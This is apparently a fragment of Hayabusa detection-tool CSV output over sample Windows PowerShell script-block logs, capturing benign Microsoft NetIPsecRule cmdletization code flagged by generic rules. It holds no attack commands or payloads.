$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery',",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 